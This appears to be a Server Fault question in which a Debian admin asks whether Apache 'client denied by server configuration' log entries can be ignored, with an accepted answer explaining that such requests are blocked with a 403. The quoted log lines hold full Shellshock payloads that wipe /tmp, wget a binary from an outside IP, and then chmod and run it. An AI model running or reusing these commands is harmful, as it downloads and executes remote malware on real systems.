# Should I worry about requests that get - client denied by server configuration, apache logs

Tags: linux, apache-2.2

I have a server with debian 7. I was checking the apache error log file and saw a few lines like this

```
[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

[Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
```

I might be mistaken, but because of this part `() { :; };` I think someone was trying to use the [shellshock](http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29) bug.

But independent from whether this is shellshock or not, the question is - if I have lines in logs with message

```
client denied by server configuration
```

is this smth that I should worry about, or because the request was declined I can ignore it - being sure that no malicious scripts were downloaded/executed ?

Comment: @Michael Hampton, I have edited my question - trying to make it more clear what I am asking: my  point was whether I can in general ignore logs like that, it was not specifically about shellshock, and especially not about testing whether im vulnerable or not. thanks

Answer (score 2, accepted):

"Client denied by server configuration" means that the request was blocked by a [Require directive](http://httpd.apache.org/docs/2.4/howto/access.html) (or in older versions of Apache, the [Allow/Deny directives](http://httpd.apache.org/docs/2.2/howto/access.html)), by a [rewrite rule](http://httpd.apache.org/docs/2.4/mod/mod_rewrite.html), or by some other Apache module. In particular it means the request was never passed on to an external handler, so the exploit could not have a chance to run. The client was just immediately served a 403 Forbidden error.